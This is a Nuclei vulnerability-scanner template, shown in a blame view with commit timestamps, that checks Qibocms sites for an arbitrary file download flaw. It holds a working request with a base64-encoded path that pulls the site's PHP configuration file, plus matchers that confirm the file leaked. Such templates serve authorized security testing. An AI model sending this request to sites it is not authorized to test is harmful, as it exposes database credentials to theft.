nuclei-templates/http/vulnerabilities/qibocms-file-download.yaml

33 lines
572 B
YAML
Raw Normal View History

2022-12-12 15:36:09 +00:00
id: qibocms-file-download
info:
name: Qibocms - Arbitrary File Download
2022-12-12 15:36:09 +00:00
author: theabhinavgaur
severity: high
2022-12-12 17:18:05 +00:00
metadata:
verified: true
2022-12-16 17:48:35 +00:00
tags: qibocms,lfr
2022-12-12 15:36:09 +00:00
http:
2022-12-12 15:36:09 +00:00
- method: GET
path:
- "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
2022-12-12 17:12:18 +00:00
- "$webdb"
2022-12-12 15:36:09 +00:00
condition: and
2022-12-12 17:10:15 +00:00
- type: word
part: header
words:
- "filename=config"
2022-12-12 15:36:09 +00:00
- type: status
status:
- 200